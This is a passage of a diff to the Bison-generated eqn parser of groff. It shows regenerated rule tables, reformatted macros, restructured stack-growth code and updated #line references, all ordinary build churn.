-@@ -558,14 +565,14 @@ static const yytype_uint8 yytranslate[] =
-   /* YYRLINE[YYN] -- Source line where rule number YYN was defined.  */
- static const yytype_uint16 yyrline[] =
- {
--       0,   121,   121,   123,   128,   130,   141,   143,   145,   150,
--     152,   154,   156,   158,   163,   165,   167,   169,   174,   176,
--     181,   183,   185,   190,   192,   194,   196,   198,   200,   202,
--     204,   206,   208,   210,   212,   214,   216,   218,   220,   222,
--     224,   226,   228,   230,   232,   234,   236,   238,   240,   242,
--     244,   246,   248,   250,   252,   254,   259,   269,   271,   276,
--     278,   283,   285,   290,   292,   297,   299,   304,   306,   308,
--     310,   314,   316,   321,   323,   325
-+       0,   125,   125,   127,   132,   134,   145,   147,   149,   154,
-+     156,   158,   160,   162,   167,   169,   171,   173,   178,   180,
-+     185,   187,   189,   194,   196,   198,   200,   202,   204,   206,
-+     208,   210,   212,   214,   216,   218,   220,   222,   224,   226,
-+     228,   230,   232,   234,   236,   238,   240,   242,   244,   246,
-+     248,   250,   252,   254,   256,   258,   263,   273,   275,   280,
-+     282,   287,   289,   294,   296,   301,   303,   308,   310,   312,
-+     314,   318,   320,   325,   327,   329
- };
- #endif
- 
-@@ -818,22 +825,22 @@ static const yytype_uint8 yyr2[] =
- 
- #define YYRECOVERING()  (!!yyerrstatus)
- 
--#define YYBACKUP(Token, Value)                                  \
--do                                                              \
--  if (yychar == YYEMPTY)                                        \
--    {                                                           \
--      yychar = (Token);                                         \
--      yylval = (Value);                                         \
--      YYPOPSTACK (yylen);                                       \
--      yystate = *yyssp;                                         \
--      goto yybackup;                                            \
--    }                                                           \
--  else                                                          \
--    {                                                           \
--      yyerror (YY_("syntax error: cannot back up")); \
--      YYERROR;                                                  \
--    }                                                           \
--while (0)
-+#define YYBACKUP(Token, Value)                                    \
-+  do                                                              \
-+    if (yychar == YYEMPTY)                                        \
-+      {                                                           \
-+        yychar = (Token);                                         \
-+        yylval = (Value);                                         \
-+        YYPOPSTACK (yylen);                                       \
-+        yystate = *yyssp;                                         \
-+        goto yybackup;                                            \
-+      }                                                           \
-+    else                                                          \
-+      {                                                           \
-+        yyerror (YY_("syntax error: cannot back up")); \
-+        YYERROR;                                                  \
-+      }                                                           \
-+  while (0)
- 
- /* Error token number */
- #define YYTERROR        1
-@@ -948,7 +955,7 @@ yy_reduce_print (yytype_int16 *yyssp, YYSTYPE *yyvsp, int yyrule)
-       YYFPRINTF (stderr, "   $%d = ", yyi + 1);
-       yy_symbol_print (stderr,
-                        yystos[yyssp[yyi + 1 - yynrhs]],
--                       &(yyvsp[(yyi + 1) - (yynrhs)])
-+                       &yyvsp[(yyi + 1) - (yynrhs)]
-                                               );
-       YYFPRINTF (stderr, "\n");
-     }
-@@ -1052,7 +1059,10 @@ yytnamerr (char *yyres, const char *yystr)
-           case '\\':
-             if (*++yyp != '\\')
-               goto do_not_strip_quotes;
--            /* Fall through.  */
-+            else
-+              goto append;
-+
-+          append:
-           default:
-             if (yyres)
-               yyres[yyn] = *yyp;
-@@ -1148,10 +1158,10 @@ yysyntax_error (YYSIZE_T *yymsg_alloc, char **yymsg,
-                 yyarg[yycount++] = yytname[yyx];
-                 {
-                   YYSIZE_T yysize1 = yysize + yytnamerr (YY_NULLPTR, yytname[yyx]);
--                  if (! (yysize <= yysize1
--                         && yysize1 <= YYSTACK_ALLOC_MAXIMUM))
-+                  if (yysize <= yysize1 && yysize1 <= YYSTACK_ALLOC_MAXIMUM)
-+                    yysize = yysize1;
-+                  else
-                     return 2;
--                  yysize = yysize1;
-                 }
-               }
-         }
-@@ -1175,9 +1185,10 @@ yysyntax_error (YYSIZE_T *yymsg_alloc, char **yymsg,
- 
-   {
-     YYSIZE_T yysize1 = yysize + yystrlen (yyformat);
--    if (! (yysize <= yysize1 && yysize1 <= YYSTACK_ALLOC_MAXIMUM))
-+    if (yysize <= yysize1 && yysize1 <= YYSTACK_ALLOC_MAXIMUM)
-+      yysize = yysize1;
-+    else
-       return 2;
--    yysize = yysize1;
-   }
- 
-   if (*yymsg_alloc < yysize)
-@@ -1303,23 +1314,33 @@ yyparse (void)
-   yychar = YYEMPTY; /* Cause a token to be read.  */
-   goto yysetstate;
- 
-+
- /*------------------------------------------------------------.
--| yynewstate -- Push a new state, which is found in yystate.  |
-+| yynewstate -- push a new state, which is found in yystate.  |
- `------------------------------------------------------------*/
-- yynewstate:
-+yynewstate:
-   /* In all cases, when you get here, the value and location stacks
-      have just been pushed.  So pushing a state here evens the stacks.  */
-   yyssp++;
- 
-- yysetstate:
-+
-+/*--------------------------------------------------------------------.
-+| yynewstate -- set current state (the top of the stack) to yystate.  |
-+`--------------------------------------------------------------------*/
-+yysetstate:
-+  YYDPRINTF ((stderr, "Entering state %d\n", yystate));
-+  YY_ASSERT (0 <= yystate && yystate < YYNSTATES);
-   *yyssp = (yytype_int16) yystate;
- 
-   if (yyss + yystacksize - 1 <= yyssp)
-+#if !defined yyoverflow && !defined YYSTACK_RELOCATE
-+    goto yyexhaustedlab;
-+#else
-     {
-       /* Get the current used size of the three stacks, in elements.  */
-       YYSIZE_T yysize = (YYSIZE_T) (yyssp - yyss + 1);
- 
--#ifdef yyoverflow
-+# if defined yyoverflow
-       {
-         /* Give user a chance to reallocate the stack.  Use copies of
-            these so that the &'s don't force the real ones into
-@@ -1338,10 +1359,7 @@ yyparse (void)
-         yyss = yyss1;
-         yyvs = yyvs1;
-       }
--#else /* no yyoverflow */
--# ifndef YYSTACK_RELOCATE
--      goto yyexhaustedlab;
--# else
-+# else /* defined YYSTACK_RELOCATE */
-       /* Extend the stack our own way.  */
-       if (YYMAXDEPTH <= yystacksize)
-         goto yyexhaustedlab;
-@@ -1357,12 +1375,11 @@ yyparse (void)
-           goto yyexhaustedlab;
-         YYSTACK_RELOCATE (yyss_alloc, yyss);
-         YYSTACK_RELOCATE (yyvs_alloc, yyvs);
--#  undef YYSTACK_RELOCATE
-+# undef YYSTACK_RELOCATE
-         if (yyss1 != yyssa)
-           YYSTACK_FREE (yyss1);
-       }
- # endif
--#endif /* no yyoverflow */
- 
-       yyssp = yyss + yysize - 1;
-       yyvsp = yyvs + yysize - 1;
-@@ -1373,19 +1390,18 @@ yyparse (void)
-       if (yyss + yystacksize - 1 <= yyssp)
-         YYABORT;
-     }
--
--  YYDPRINTF ((stderr, "Entering state %d\n", yystate));
-+#endif /* !defined yyoverflow && !defined YYSTACK_RELOCATE */
- 
-   if (yystate == YYFINAL)
-     YYACCEPT;
- 
-   goto yybackup;
- 
-+
- /*-----------.
- | yybackup.  |
- `-----------*/
- yybackup:
--
-   /* Do appropriate processing given the current state.  Read a
-      lookahead token if we need one and don't already have one.  */
- 
-@@ -1443,7 +1459,6 @@ yybackup:
-   YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN
-   *++yyvsp = yylval;
-   YY_IGNORE_MAYBE_UNINITIALIZED_END
--
-   goto yynewstate;
- 
- 
-@@ -1458,7 +1473,7 @@ yydefault:
- 
- 
- /*-----------------------------.
--| yyreduce -- Do a reduction.  |
-+| yyreduce -- do a reduction.  |
- `-----------------------------*/
- yyreduce:
-   /* yyn is the number of a rule to reduce with.  */
-@@ -1478,20 +1493,20 @@ yyreduce:
-   YY_REDUCE_PRINT (yyn);
-   switch (yyn)
-     {
--        case 3:
--#line 124 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+  case 3:
-+#line 128 "src/preproc/eqn/eqn.ypp"
-     { (yyvsp[0].b)->top_level(); non_empty_flag = 1; }
--#line 1485 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1500 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 4:
--#line 129 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 133 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = (yyvsp[0].b); }
--#line 1491 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1506 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 5:
--#line 131 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 135 "src/preproc/eqn/eqn.ypp"
-     {
- 		  list_box *lb = (yyvsp[-1].b)->to_list_box();
- 		  if (!lb)
-@@ -1499,436 +1514,437 @@ yyreduce:
- 		  lb->append((yyvsp[0].b));
- 		  (yyval.b) = lb;
- 		}
--#line 1503 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1518 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 6:
--#line 142 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 146 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = (yyvsp[0].b); }
--#line 1509 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1524 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 7:
--#line 144 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 148 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = make_mark_box((yyvsp[0].b)); }
--#line 1515 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1530 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 8:
--#line 146 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 150 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = make_lineup_box((yyvsp[0].b)); }
--#line 1521 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1536 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 9:
--#line 151 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 155 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = (yyvsp[0].b); }
--#line 1527 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1542 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 10:
--#line 153 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 157 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = make_limit_box((yyvsp[-2].b), 0, (yyvsp[0].b)); }
--#line 1533 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1548 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 11:
--#line 155 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 159 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = make_limit_box((yyvsp[-2].b), (yyvsp[0].b), 0); }
--#line 1539 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1554 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 12:
--#line 157 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 161 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = make_limit_box((yyvsp[-4].b), (yyvsp[-2].b), (yyvsp[0].b)); }
--#line 1545 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1560 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 13:
--#line 159 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 163 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = make_limit_box((yyvsp[-4].b), make_limit_box((yyvsp[-2].b), (yyvsp[0].b), 0), 0); }
--#line 1551 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1566 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 14:
--#line 164 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 168 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = (yyvsp[0].b); }
--#line 1557 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1572 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 15:
--#line 166 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 170 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = make_sqrt_box((yyvsp[0].b)); }
--#line 1563 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1578 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 16:
--#line 168 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 172 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = make_over_box((yyvsp[-2].b), (yyvsp[0].b)); }
--#line 1569 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1584 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 17:
--#line 170 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 174 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = make_small_over_box((yyvsp[-2].b), (yyvsp[0].b)); }
--#line 1575 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1590 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 18:
--#line 175 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 179 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = (yyvsp[0].b); }
--#line 1581 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1596 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 19:
--#line 177 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 181 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = make_script_box((yyvsp[-2].b), 0, (yyvsp[0].b)); }
--#line 1587 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1602 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 20:
--#line 182 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 186 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = (yyvsp[0].b); }
--#line 1593 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1608 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 21:
--#line 184 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 188 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = make_script_box((yyvsp[-2].b), (yyvsp[0].b), 0); }
--#line 1599 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1614 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 22:
--#line 186 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 190 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = make_script_box((yyvsp[-4].b), (yyvsp[-2].b), (yyvsp[0].b)); }
--#line 1605 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1620 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 23:
--#line 191 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 195 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = split_text((yyvsp[0].str)); }
--#line 1611 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1626 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 24:
--#line 193 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 197 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = new quoted_text_box((yyvsp[0].str)); }
--#line 1617 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1632 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 25:
--#line 195 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 199 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = split_text((yyvsp[0].str)); }
--#line 1623 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1638 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 26:
--#line 197 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 201 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = new quoted_text_box((yyvsp[0].str)); }
--#line 1629 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1644 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 27:
--#line 199 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 203 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = new half_space_box; }
--#line 1635 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1650 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 28:
--#line 201 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 205 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = new space_box; }
--#line 1641 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1656 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 29:
--#line 203 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 207 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = new tab_box; }
--#line 1647 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1662 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 30:
--#line 205 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 209 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = (yyvsp[-1].b); }
--#line 1653 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1668 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 31:
--#line 207 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 211 "src/preproc/eqn/eqn.ypp"
-     { (yyvsp[0].pb)->set_alignment(CENTER_ALIGN); (yyval.b) = (yyvsp[0].pb); }
--#line 1659 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1674 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 32:
--#line 209 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 213 "src/preproc/eqn/eqn.ypp"
-     { (yyvsp[0].pb)->set_alignment(LEFT_ALIGN); (yyval.b) = (yyvsp[0].pb); }
--#line 1665 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1680 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 33:
--#line 211 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 215 "src/preproc/eqn/eqn.ypp"
-     { (yyvsp[0].pb)->set_alignment(RIGHT_ALIGN); (yyval.b) = (yyvsp[0].pb); }
--#line 1671 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1686 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 34:
--#line 213 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 217 "src/preproc/eqn/eqn.ypp"
-     { (yyvsp[0].pb)->set_alignment(CENTER_ALIGN); (yyval.b) = (yyvsp[0].pb); }
--#line 1677 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1692 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 35:
--#line 215 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 219 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = (yyvsp[-1].mb); }
--#line 1683 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1698 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 36:
--#line 217 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 221 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = make_delim_box((yyvsp[-3].str), (yyvsp[-2].b), (yyvsp[0].str)); }
--#line 1689 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1704 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 37:
--#line 219 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 223 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = make_delim_box((yyvsp[-1].str), (yyvsp[0].b), 0); }
--#line 1695 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1710 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 38:
--#line 221 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 225 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = make_overline_box((yyvsp[-1].b)); }
--#line 1701 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1716 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 39:
--#line 223 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 227 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = make_underline_box((yyvsp[-1].b)); }
--#line 1707 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1722 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 40:
--#line 225 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 229 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = make_prime_box((yyvsp[-1].b)); }
--#line 1713 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1728 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 41:
--#line 227 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 231 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = make_accent_box((yyvsp[-2].b), (yyvsp[0].b)); }
--#line 1719 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1734 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 42:
--#line 229 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 233 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = make_uaccent_box((yyvsp[-2].b), (yyvsp[0].b)); }
--#line 1725 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1740 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 43:
--#line 231 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 235 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = new font_box(strsave(get_grfont()), (yyvsp[0].b)); }
--#line 1731 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1746 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 44:
--#line 233 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 237 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = new font_box(strsave(get_gbfont()), (yyvsp[0].b)); }
--#line 1737 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1752 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 45:
--#line 235 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 239 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = new font_box(strsave(get_gfont()), (yyvsp[0].b)); }
--#line 1743 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1758 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 46:
--#line 237 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 241 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = new fat_box((yyvsp[0].b)); }
--#line 1749 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1764 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 47:
--#line 239 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 243 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = new font_box((yyvsp[-1].str), (yyvsp[0].b)); }
--#line 1755 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1770 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 48:
--#line 241 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 245 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = new size_box((yyvsp[-1].str), (yyvsp[0].b)); }
--#line 1761 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1776 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 49:
--#line 243 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 247 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = new hmotion_box((yyvsp[-1].n), (yyvsp[0].b)); }
--#line 1767 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1782 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 50:
--#line 245 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 249 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = new hmotion_box(-(yyvsp[-1].n), (yyvsp[0].b)); }
--#line 1773 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1788 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 51:
--#line 247 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 251 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = new vmotion_box((yyvsp[-1].n), (yyvsp[0].b)); }
--#line 1779 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1794 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 52:
--#line 249 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 253 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = new vmotion_box(-(yyvsp[-1].n), (yyvsp[0].b)); }
--#line 1785 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1800 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 53:
--#line 251 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 255 "src/preproc/eqn/eqn.ypp"
-     { (yyvsp[0].b)->set_spacing_type((yyvsp[-1].str)); (yyval.b) = (yyvsp[0].b); }
--#line 1791 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1806 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 54:
--#line 253 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 257 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = new vcenter_box((yyvsp[0].b)); }
--#line 1797 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1812 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 55:
--#line 255 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 259 "src/preproc/eqn/eqn.ypp"
-     { (yyval.b) = make_special_box((yyvsp[-1].str), (yyvsp[0].b)); }
--#line 1803 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1818 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 56:
--#line 260 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 264 "src/preproc/eqn/eqn.ypp"
-     {
- 		  int n;
- 		  if (sscanf((yyvsp[0].str), "%d", &n) == 1)
- 		    (yyval.n) = n;
- 		  a_delete (yyvsp[0].str);
- 		}
--#line 1814 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1829 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 57:
--#line 270 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 274 "src/preproc/eqn/eqn.ypp"
-     { (yyval.pb) = new pile_box((yyvsp[0].b)); }
--#line 1820 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1835 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 58:
--#line 272 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 276 "src/preproc/eqn/eqn.ypp"
-     { (yyvsp[-2].pb)->append((yyvsp[0].b)); (yyval.pb) = (yyvsp[-2].pb); }
--#line 1826 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1841 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 59:
--#line 277 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 281 "src/preproc/eqn/eqn.ypp"
-     { (yyval.pb) = (yyvsp[-1].pb); }
--#line 1832 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1847 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 60:
--#line 279 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 283 "src/preproc/eqn/eqn.ypp"
-     { (yyvsp[-1].pb)->set_space((yyvsp[-3].n)); (yyval.pb) = (yyvsp[-1].pb); }
--#line 1838 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1853 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 61:
--#line 284 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 288 "src/preproc/eqn/eqn.ypp"
-     { (yyval.mb) = new matrix_box((yyvsp[0].col)); }
--#line 1844 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1859 "src/preproc/eqn/eqn.cpp"
-     break;
- 
-   case 62:
--#line 286 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645  */
-+#line 290 "src/preproc/eqn/eqn.ypp"
-     { (yyvsp[-1].mb)->append((yyvsp[0].col)); (yyval.mb) = (yyvsp[-1].mb); }
--#line 1850 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645  */
-+#line 1865 "src/preproc/eqn/eqn.cpp"
